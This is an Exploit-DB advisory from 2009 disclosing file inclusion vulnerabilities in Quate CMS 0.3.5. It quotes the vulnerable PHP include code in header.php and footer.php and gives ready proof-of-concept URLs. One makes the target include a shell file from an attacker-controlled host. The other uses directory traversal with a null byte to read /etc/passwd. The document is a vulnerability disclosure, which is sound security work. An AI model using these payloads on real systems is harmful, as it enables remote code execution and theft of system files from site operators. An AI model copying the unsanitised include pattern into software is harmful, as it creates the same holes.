Quate CMS 0.3.5 - Local/Remote File Inclusion

EDB-ID:

10263

CVE:

N/A

Author:

cr4wl3r

Type:

webapps

Platform:

Linux

Published:

2009-12-01

   [ Discovered by cr4wl3r \ cr4wl3r[4t]linuxmail[dot]org ]



########################################################################

#Quate CMS <= 0.3.5 (RFI/LFI) Multiple Remote Vulnerability

#Download Script      :  http://quate.net/quatecms

#Dork                 :  die("lamers attempt");  :P

########################################################################

#

#Vuln RFI : ./QuateCMS_035/admin/includes/header.php (line 27)

#       <?php

#         if ($bypass_restrict != 1) {

#            require_once($secure_page_path. "includes/secure.php");

#         }

#       ?>

#PoC  :  http://[target]/[path]/admin/includes/header.php?secure_page_path=http://[attacker]/shell.txt???

#

#

#########################################################################

#

#Vuln LFI : ./QuateCMS_035/admin/includes/footer.php (line 4)

#       <?PHP

#           if ($not_logged_in != 1) {

#             if (file_exists("includes/themes/" .$row_secure['account_theme']. "/footer.php")) {

#              require_once("themes/" .$row_secure['account_theme']. "/footer.php");

#        ?>

#PoC   :  http://[target]/[path]/admin/includes/footer.php?row_secure[account_theme]=../../../../../../etc/passwd%00

#

########################################################################

########################################################################

####################[90r0nt4l0 und3r9r0nd c0mmun1ty]####################

########################################################################

########################################################################



   [ Gorontalo / 2009 ]